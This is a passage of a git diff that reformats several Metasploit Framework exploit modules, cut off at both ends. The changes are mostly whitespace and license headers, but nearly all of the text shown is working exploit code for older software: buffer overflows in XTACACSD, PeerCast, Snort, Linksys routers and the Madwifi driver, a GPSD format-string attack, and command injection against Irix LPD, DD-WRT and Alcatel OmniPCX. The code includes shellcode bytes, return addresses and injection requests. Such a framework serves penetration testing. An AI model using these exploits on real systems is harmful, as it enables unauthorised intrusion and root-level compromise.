"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" + + "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" + + "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08", + 'NOP' => "\x90\x1b\x80\x0e", + } + ], + ], + 'DefaultTarget' => 0)) register_options( [ @@ -168,7 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Waiting for login prompt") res = dialup_expect(/ogin:\s/i, 10) - #puts Rex::Text.to_hex_dump(res[:buffer]) + #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Login prompt not found... Exiting.") disconnect_dialup @@ -196,18 +200,18 @@ class Metasploit3 < Msf::Exploit::Remote # wait for password prompt print_status("Waiting for password prompt") res = dialup_expect(/assword:/i, 30) - #puts Rex::Text.to_hex_dump(res[:buffer]) - if not res[:match] + #puts Rex::Text.to_hex_dump(res[:buffer]) + if not res[:match] print_error("Target is likely not vulnerable... Exiting.") disconnect_dialup return - end + end print_status("Password prompt received, waiting for shell") dialup_puts("pass\n") res = dialup_expect(/#\s/i, 20) - #puts Rex::Text.to_hex_dump(res[:buffer]) + #puts Rex::Text.to_hex_dump(res[:buffer]) if not res[:match] print_error("Shell not found.") print_error("Target is likely not vulnerable... Exiting.") diff --git a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb index 53b6fa5ff7..b6c0cf41ae 100644 --- a/modules/exploits/freebsd/tacacs/xtacacsd_report.rb +++ b/modules/exploits/freebsd/tacacs/xtacacsd_report.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -11,7 +11,6 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,13 +22,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'XTACACSD <= 4.1.2 report() Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in XTACACSD <= 4.1.2. By - sending a specially crafted XTACACS packet with an overly long - username, an attacker may be able to execute arbitrary code. + sending a specially crafted XTACACS packet with an overly long + username, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2008-7232'], ['OSVDB', '58140'], ['URL', 'http://aluigi.altervista.org/adv/xtacacsdz-adv.txt'], @@ -43,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'BSD', - 'Arch' => ARCH_X86, + 'Arch' => ARCH_X86, 'Targets' => [ ['FreeBSD 6.2-Release Bruteforce', @@ -60,8 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 8 2008')) - register_options([Opt::RPORT(49)], self.class) - + register_options([Opt::RPORT(49)], self.class) end def brute_exploit(address) @@ -81,12 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote sploit << "\x00\x00\x00\x00" # Result 2 sploit << "\x00\x00" # Result 3 sploit << make_nops(238 - payload.encoded.length) - sploit << payload.encoded + [address['Ret']].pack('V') + sploit << payload.encoded + [address['Ret']].pack('V') - print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") + print_status("Trying target #{target.name} #{"%.8x" % address['Ret']}...") udp_sock.put(sploit) - - disconnect_udp + + disconnect_udp end end diff --git a/modules/exploits/irix/lpd/tagprinter_exec.rb b/modules/exploits/irix/lpd/tagprinter_exec.rb index 86239cd8a3..a11527d090 100644 --- a/modules/exploits/irix/lpd/tagprinter_exec.rb +++ b/modules/exploits/irix/lpd/tagprinter_exec.rb @@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Irix LPD tagprinter Command Execution', 'Description' => %q{ - This module exploits an arbitrary command execution flaw in - the in.lpd service shipped with all versions of Irix. + This module exploits an arbitrary command execution flaw in + the in.lpd service shipped with all versions of Irix. }, 'Author' => [ 'optyx', 'hdm' ], 'License' => MSF_LICENSE, @@ -46,18 +44,18 @@ class Metasploit3 < Msf::Exploit::Remote 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet', } - }, - 'Targets' => + }, + 'Targets' => [ [ 'Automatic Target', { }] ], 'DisclosureDate' => 'Sep 01 2001', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(515) - ], self.class) + + register_options( + [ + Opt::RPORT(515) + ], self.class) end def check @@ -65,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote sock.put("T;uname -a;\n") resp = sock.get_once disconnect - + if (resp =~ /IRIX/) print_status("Response: #{resp.strip}") return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end - + def exploit connect sock.put("T;#{payload.encoded};\n") diff --git a/modules/exploits/linux/games/ut2004_secure.rb b/modules/exploits/linux/games/ut2004_secure.rb index 1eba790a3f..3a862516be 100644 --- a/modules/exploits/linux/games/ut2004_secure.rb +++ b/modules/exploits/linux/games/ut2004_secure.rb @@ -3,39 +3,35 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Unreal Tournament 2004 "secure" Overflow (Linux)', 'Description' => %q{ - - This is an exploit for the GameSpy secure query in - the Unreal Engine. + This is an exploit for the GameSpy secure query in + the Unreal Engine. - This exploit only requires one UDP packet, which can - be both spoofed and sent to a broadcast address. - Usually, the GameSpy query server listens on port 7787, - but you can manually specify the port as well. + This exploit only requires one UDP packet, which can + be both spoofed and sent to a broadcast address. + Usually, the GameSpy query server listens on port 7787, + but you can manually specify the port as well. - The RunServer.sh script will automatically restart the - server upon a crash, giving us the ability to - bruteforce the service and exploit it multiple - times. - + The RunServer.sh script will automatically restart the + server upon a crash, giving us the ability to + bruteforce the service and exploit it multiple + times. }, 'Author' => [ 'onetwo' ], 'License' => BSD_LICENSE, @@ -55,70 +51,70 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'linux', - 'Targets' => + 'Targets' => [ ['UT2004 Linux Build 3120', { 'Rets' => [ 0x0884a33b, 0x08963460 ] }], #JMP ESP , (free/realloc) BSS pointer ['UT2004 Linux Build 3186', { 'Rets' => [ 0x088c632f, 0x089eb2f0 ] }], ], 'DisclosureDate' => 'Jun 18 2004')) - register_options( - [ - Opt::RPORT(7787) - ], self.class) + register_options( + [ + Opt::RPORT(7787) + ], self.class) end - + def exploit connect_udp - + buf = make_nops(1024) buf[24, 4] = [target['Rets'][1]].pack('V') buf[44, 4] = [target['Rets'][0]].pack('V') - buf[56, 4] = [target['Rets'][1]].pack('V') + buf[56, 4] = [target['Rets'][1]].pack('V') buf[48, 6] = "\x8d\x64\x24\x0c\xff\xe4" #LEA/JMP - + buf[0, 8] = "\\secure\\" buf[buf.length - payload.encoded.length, payload.encoded.length] = payload.encoded - - udp_sock.put(buf) - + + udp_sock.put(buf) + handler disconnect_udp end - + def ut_version connect_udp udp_sock.put("\\basic\\") res = udp_sock.recvfrom(8192) - disconnect_udp - + disconnect_udp + if (res and (m=res.match(/\\gamever\\([0-9]{1,5})/))) return m[1] end - + return end - + def check vers = ut_version - + if (not vers) print_status("Could not detect Unreal Tournament Server") return end - + print_status("Detected Unreal Tournament Server Version: #{vers}") if (vers =~ /^(3120|3186|3204)$/) print_status("This system appears to be exploitable") return Exploit::CheckCode::Appears end - - + + if (vers =~ /^(2...)$/) print_status("This system appears to be running UT2003") return Exploit::CheckCode::Detected end - + print_status("This system appears to be patched") return Exploit::CheckCode::Safe end diff --git a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb index 5a013902c0..05c203611c 100644 --- a/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb +++ b/modules/exploits/linux/http/alcatel_omnipcx_mastercgi_exec.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution', 'Description' => %q{ - This module abuses a metacharacter injection vulnerability in the + This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker @@ -42,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www1.alcatel-lucent.com/psirt/statements/2007002/OXEUMT.htm' ], ], 'Platform' => ['unix'], - 'Arch' => ARCH_CMD, + 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { @@ -54,27 +52,27 @@ class Metasploit3 < Msf::Exploit::Remote 'RequiredCmd' => 'generic' } }, - 'Targets' => + 'Targets' => [ [ 'Automatic Target', { }] ], 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(443), - OptBool.new('SSL', [true, 'Use SSL', true]), - ], self.class) + + register_options( + [ + Opt::RPORT(443), + OptBool.new('SSL', [true, 'Use SSL', true]), + ], self.class) end - + def exploit connect cmd = payload.encoded.gsub(" ", '${IFS}') - req = + req = "GET /cgi-bin/masterCGI?ping=nomip&user=;#{cmd}; HTTP/1.1\r\n" + "Host: #{rhost}\r\n\r\n" - + print_status("Sending GET request with command line payload...") sock.put(req) diff --git a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb index 3554eb0a3f..184eb8595f 100644 --- a/modules/exploits/linux/http/ddwrt_cgibin_exec.rb +++ b/modules/exploits/linux/http/ddwrt_cgibin_exec.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking @@ -22,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'DD-WRT HTTP Daemon Arbitrary Command Execution', 'Description' => %q{ - This module abuses a metacharacter injection vulnerability in the - HTTP management server of wireless gateways running DD-WRT. This flaw - allows an unauthenticated attacker to execute arbitrary commands as - the root user account. + This module abuses a metacharacter injection vulnerability in the + HTTP management server of wireless gateways running DD-WRT. This flaw + allows an unauthenticated attacker to execute arbitrary commands as + the root user account. }, 'Author' => [ 'gat3way', 'hdm' ], 'License' => MSF_LICENSE, @@ -56,10 +54,10 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0)) - register_options( - [ - Opt::RPORT(80) - ], self.class) + register_options( + [ + Opt::RPORT(80) + ], self.class) end def exploit @@ -80,4 +78,3 @@ class Metasploit3 < Msf::Exploit::Remote end end - diff --git a/modules/exploits/linux/http/gpsd_format_string.rb b/modules/exploits/linux/http/gpsd_format_string.rb index 99f3f6e5f4..c9a34f535a 100644 --- a/modules/exploits/linux/http/gpsd_format_string.rb +++ b/modules/exploits/linux/http/gpsd_format_string.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -7,12 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Berlios GPSD Format String Vulnerability', 'Description' => %q{ - This module exploits a format string vulnerability in the Berlios GPSD server. + This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre. - }, 'Author' => [ 'Yann Senotier ' ], 'License' => MSF_LICENSE, @@ -34,52 +43,53 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x0c", }, - 'Targets' => + 'Targets' => [ - - [ 'gpsd-1.91-1.i386.rpm', { 'Syslog' => 0x0804f250, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.92-1.i386.rpm', { 'Syslog' => 0x0804f630, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.93-1.i386.rpm', { 'Syslog' => 0x0804e154, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.94-1.i386.rpm', { 'Syslog' => 0x0804f260, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.95-1.i386.rpm', { 'Syslog' => 0x0804f268, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.96-1.i386.rpm', { 'Syslog' => 0x41424344, 'Ret' => 0x41424344 }, ], - [ 'gpsd-1.97-1.i386.rpm', { 'Syslog' => 0x0804b14c, 'Ret' => 0x41424344 }, ], - [ 'gpsd-2.1-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], - [ 'gpsd-2.2-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], - [ 'gpsd-2.3-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbfffd661 }, ], - [ 'gpsd-2.4-1.i386.rpm', { 'Syslog' => 0x0804c7b8, 'Ret' => 0xbfffde71 }, ], - [ 'gpsd-2.5-1.i386.rpm', { 'Syslog' => 0x0804c7dc, 'Ret' => 0xbfffdc09 }, ], - [ 'gpsd-2.6-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbffff100 }, ], - [ 'gpsd-2.7-1.i386.rpm', { 'Syslog' => 0x0804c5bc, 'Ret' => 0xbfffcabc }, ], - [ 'gpsd_2.6-1_i386.deb', { 'Syslog' => 0x0804c7c4, 'Ret' => 0xbfffedc8 }, ], - [ 'gpsd_2.7-1_i386.deb', { 'Syslog' => 0x0804c6c4, 'Ret' => 0xbfffc818 }, ], - [ 'gpsd_2.7-2_i386.deb', { 'Syslog' => 0x0804c770, 'Ret' => 0xbfffee70 }, ], - [ 'SuSE 9.1 compiled 2.0', { 'Syslog' => 0x0804c818, 'Ret' => 0xbfffe148 }, ], - [ 'Slackware 9.0 compiled 2.0', { 'Syslog' => 0x0804b164, 'Ret' => 0xbfffd7d6 }, ], - [ 'Slackware 9.0 compiled 2.7', { 'Syslog' => 0x0804c3ec, 'Ret' => 0xbfffe65c }, ], - [ 'Debug ', { 'Syslog' => 0x41424344, 'Ret' => 0xdeadbeef }, ], - + [ 'gpsd-1.91-1.i386.rpm', { 'Syslog' => 0x0804f250, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.92-1.i386.rpm', { 'Syslog' => 0x0804f630, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.93-1.i386.rpm', { 'Syslog' => 0x0804e154, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.94-1.i386.rpm', { 'Syslog' => 0x0804f260, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.95-1.i386.rpm', { 'Syslog' => 0x0804f268, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.96-1.i386.rpm', { 'Syslog' => 0x41424344, 'Ret' => 0x41424344 }, ], + [ 'gpsd-1.97-1.i386.rpm', { 'Syslog' => 0x0804b14c, 'Ret' => 0x41424344 }, ], + [ 'gpsd-2.1-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], + [ 'gpsd-2.2-1.i386.rpm', { 'Syslog' => 0x0804c7a0, 'Ret' => 0x41424344 }, ], + [ 'gpsd-2.3-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbfffd661 }, ], + [ 'gpsd-2.4-1.i386.rpm', { 'Syslog' => 0x0804c7b8, 'Ret' => 0xbfffde71 }, ], + [ 'gpsd-2.5-1.i386.rpm', { 'Syslog' => 0x0804c7dc, 'Ret' => 0xbfffdc09 }, ], + [ 'gpsd-2.6-1.i386.rpm', { 'Syslog' => 0x0804c730, 'Ret' => 0xbffff100 }, ], + [ 'gpsd-2.7-1.i386.rpm', { 'Syslog' => 0x0804c5bc, 'Ret' => 0xbfffcabc }, ], + [ 'gpsd_2.6-1_i386.deb', { 'Syslog' => 0x0804c7c4, 'Ret' => 0xbfffedc8 }, ], + [ 'gpsd_2.7-1_i386.deb', { 'Syslog' => 0x0804c6c4, 'Ret' => 0xbfffc818 }, ], + [ 'gpsd_2.7-2_i386.deb', { 'Syslog' => 0x0804c770, 'Ret' => 0xbfffee70 }, ], + [ 'SuSE 9.1 compiled 2.0', { 'Syslog' => 0x0804c818, 'Ret' => 0xbfffe148 }, ], + [ 'Slackware 9.0 compiled 2.0', { 'Syslog' => 0x0804b164, 'Ret' => 0xbfffd7d6 }, ], + [ 'Slackware 9.0 compiled 2.7', { 'Syslog' => 0x0804c3ec, 'Ret' => 0xbfffe65c }, ], + [ 'Debug ', { 'Syslog' => 0x41424344, 'Ret' => 0xdeadbeef }, ], ], 'DisclosureDate' => 'May 25 2005')) - - register_options( [ Opt::RPORT(2947) ], self.class ) + + register_options( + [ + Opt::RPORT(2947) + ], self.class) end def exploit connect print_status("Trying target #{target.name}...") - + offset = 17 dump_fmt = 7 al = 3 - + hi = (target.ret >> 0) & 0xffff lo = (target.ret >> 16) & 0xffff - + shift0 = sprintf("%d",hi) - sprintf("%d",offset) - (dump_fmt * 8 + 16 + al) shift1 = (sprintf("%d",0x10000) + sprintf("%d",lo)) - sprintf("%d",hi) - + buf = "A" * 3 + "B" * 4 buf += [ target['Syslog']].pack('V') buf += "B" * 4 @@ -88,7 +98,7 @@ class Metasploit3 < Msf::Exploit::Remote buf += make_nops(3000) + payload.encoded sock.put(buf) - + handler disconnect end diff --git a/modules/exploits/linux/http/linksys_apply_cgi.rb b/modules/exploits/linux/http/linksys_apply_cgi.rb index 37daf74363..93e78470f8 100644 --- a/modules/exploits/linux/http/linksys_apply_cgi.rb +++ b/modules/exploits/linux/http/linksys_apply_cgi.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -7,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Linksys apply.cgi buffer overflow', 'Description' => %q{ - This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. + This module exploits a stack overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected. }, @@ -31,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Arch' => ARCH_MIPSLE, 'Platform' => 'linux', - 'Targets' => + 'Targets' => [ # the middle of the intersection is our generic address #((addrs.map { |n, h| [h["Bufaddr"],n] }.max[0] + addrs.map { |n, h| [h["Bufaddr"],n] }.min[0]+9500)/2).to_s(16) @@ -45,17 +55,17 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Sep 13 2005', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(80), - Opt::RHOST('192.168.1.1') - ], self.class) + + register_options( + [ + Opt::RPORT(80), + Opt::RHOST('192.168.1.1') + ], self.class) end + # Approx size of the remaining space in the data segment after our buffer + DataSegSize = 0x4000 -# Approx size of the remaining space in the data segment after our buffer -DataSegSize=0x4000 def exploit c = connect @@ -73,15 +83,15 @@ DataSegSize=0x4000 # | <- 10000 -> | **************************** Pad with return address *********************** # I know this is horrible :( - On the other side this is very generic :) post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+addr*(DataSegSize/4) - + #post_data = "\x00"*(10000-payload.encoded.length)+payload.encoded+original+addr*2#+"\x24\xad\x43" -# res = send_request_cgi({ 'uri' => "/apply.cgi", +# res = send_request_cgi({ 'uri' => "/apply.cgi", # 'method' => 'POST', # 'data' => post_data }); # print_status("Malicious request sent, do_ej should be overwritten") - - req = c.request_cgi({ 'uri' => "/apply.cgi", + + req = c.request_cgi({ 'uri' => "/apply.cgi", 'method' => 'POST', 'data' => post_data }) c.send_request(req) diff --git a/modules/exploits/linux/http/peercast_url.rb b/modules/exploits/linux/http/peercast_url.rb index 3501ee35da..301289c3d1 100644 --- a/modules/exploits/linux/http/peercast_url.rb +++ b/modules/exploits/linux/http/peercast_url.rb @@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)', 'Description' => %q{ - This module exploits a stack overflow in PeerCast <= v0.1216. + This module exploits a stack overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters. - }, 'Author' => [ 'MC' ], 'License' => BSD_LICENSE, @@ -47,29 +44,31 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'linux', 'Arch' => ARCH_X86, - 'Targets' => + 'Targets' => [ ['PeerCast v0.1212 Binary', { 'Ret' => 0x080922f7 }], ], 'DisclosureDate' => 'Mar 8 2006')) - - register_options( [ Opt::RPORT(7144) ], self.class ) + + register_options([ + Opt::RPORT(7144) + ], self.class) end def exploit connect - + pat = rand_text_alphanumeric(780) pat << [target.ret].pack('V') pat << payload.encoded uri = '/stream/?' + pat - + res = "GET #{uri} HTTP/1.0\r\n\r\n" - + print_status("Trying target address 0x%.8x..." % target.ret) sock.put(res) - + handler disconnect end diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 8c380ff1b3..9612b0aabc 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking @@ -22,10 +20,10 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit', 'Description' => %q{ - This module exploits a stack overflow in the Back Orifice pre-processor module - included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could - be used to completely compromise a Snort sensor, and would typically gain an attacker - full root or administrative privileges. + This module exploits a stack overflow in the Back Orifice pre-processor module + included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could + be used to completely compromise a Snort sensor, and would typically gain an attacker + full root or administrative privileges. }, 'Author' => 'KaiJern Lau ', 'License' => BSD_LICENSE, @@ -39,7 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote ], 'Payload' => { - 'Space' => 1073, #ret : 1069 + 'Space' => 1073, #ret : 1069 'BadChars' => "\x00", }, 'Targets' => @@ -54,14 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote ], ], 'DefaultTarget' => 0)) - + # Configure the default port to be 9080 register_options( [ Opt::RPORT(9080), ], self.class) - end def msrand(seed) @@ -90,20 +87,20 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_udp - - boheader = + + boheader = "*!*QWTY?" + [1096].pack("V") + # Length ,thanx Russell Sanford "\xed\xac\xef\x0d"+ # ID "\x01" # PING - + filler = make_nops(1069 -(boheader.length + payload.encode.length)) udp_sock.write( bocrypt(boheader+payload.encode+filler+[target.ret].pack('V')) ) - + handler disconnect_udp end diff --git a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb index b2c50e3041..ba6815834a 100644 --- a/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb +++ b/modules/exploits/linux/madwifi/madwifi_giwscan_cb.rb @@ -1,5 +1,16 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + # Madwifi remote kernel exploit -# 100% reliable, does'nt crash wifi stack, can exploit +# 100% reliable, doesn't crash wifi stack, can exploit # same target multiple times # # Julien TINNES @@ -9,77 +20,88 @@ # # ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb # + require 'msf/core' require 'metasm' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Lorcon2 def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow', 'Description' => %q{ -The Madwifi driver under Linux is vulnerable to a remote kernel-mode -stack-based buffer overflow. + The Madwifi driver under Linux is vulnerable to a remote kernel-mode + stack-based buffer overflow. -The vulnerability is triggered by one of these properly crafted . -information element: WPA, RSN, WME and Atheros OUI Current madwifi . -driver (0.9.2) and and all madwifi-ng drivers since r1504 are . -vulnerable . + The vulnerability is triggered by one of these properly crafted + information element: WPA, RSN, WME and Atheros OUI Current madwifi + driver (0.9.2) and and all madwifi-ng drivers since r1504 are + vulnerable -Madwifi 0.9.2.1 release corrects the issue. + Madwifi 0.9.2.1 release corrects the issue. -This module has been tested against Ubuntu 6.10 and is 100% reliable, -does'nt crash the Wifi stack and can exploit the same machine multiple -time without the need to reboot it. + This module has been tested against Ubuntu 6.10 and is 100% reliable, + doesn\'t crash the Wifi stack and can exploit the same machine multiple + time without the need to reboot it. -This module depends on the Lorcon2 library and only works on the Linux -platform with a supported wireless card. Please see the Ruby Lorcon2 -documentation (external/ruby-lorcon/README) for more information. - }, - - 'Author' => + This module depends on the Lorcon2 library and only works on the Linux + platform with a supported wireless card. Please see the Ruby Lorcon2 + documentation (external/ruby-lorcon/README) for more information. + }, + 'Author' => [ - 'Julien Tinnes ', - 'Laurent Butti <0x9090 at gmail.com>' + 'Julien Tinnes ', + 'Laurent Butti <0x9090 at gmail.com>' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision$', - 'Targets' => - [ - ['Ubuntu 6.10', { 'JMPESP' => 0xffffe777, 'scan_iterate_ra' => "0x8014401" }], - ['Generic (you need non randomized vdso)', { 'JMPESP' => 0xffffe777, 'scan_iterate_ra' => nil }] - ], - # 'Stance' => Msf::Exploit::Stance::Passive, - 'Payload' => { - #'Space' => 65, - # Metasploit does'nt support dynamic size payloads - # so we will handle this in metasm instead and ask for - # the smaller payload possible - #'Encoder' => Msf::Encoder::Type::Raw, - 'DisableNops' => true }, - - 'Platform' => 'linux', - 'Arch' => [ ARCH_X86], - 'References' => + 'License' => MSF_LICENSE, + 'Version' => '$Revision$', + 'References' => [ ['CVE', '2006-6332'], ['OSVDB', '31267'], - ['URL', 'http://www.madwifi.org'], - ] - )) - register_options( + ['URL', 'http://www.madwifi.org'] + ], + #'Stance' => Msf::Exploit::Stance::Passive, + 'Platform' => 'linux', + 'Arch' => [ ARCH_X86 ], + 'Payload' => + { + #'Space' => 65, + # Metasploit doesn't support dynamic size payloads + # so we will handle this in metasm instead and ask for + # the smaller payload possible + #'Encoder' => Msf::Encoder::Type::Raw, + 'DisableNops' => true + }, + 'Targets' => [ + [ 'Ubuntu 6.10', + { + 'JMPESP' => 0xffffe777, + 'scan_iterate_ra' => "0x8014401" + } + ], + + [ 'Generic (you need non randomized vdso)', + { + 'JMPESP' => 0xffffe777, + 'scan_iterate_ra' => nil + } + ] + ] + )) + + register_options( + [ OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']), OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']), OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]), OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]), OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']), - ], self.class) - + ], self.class) end def exploit @@ -109,30 +131,33 @@ documentation (external/ruby-lorcon/README) for more information. print_status("Completed sending #{count} beacons.") end -def create_beacon - ssid = datastore['SSID'].to_s - bssid = Rex::Text.rand_text(6) - channel = datastore['CHANNEL'].to_i - len = datastore['LENGTH'].to_i - seq = [rand(255)].pack('n') - 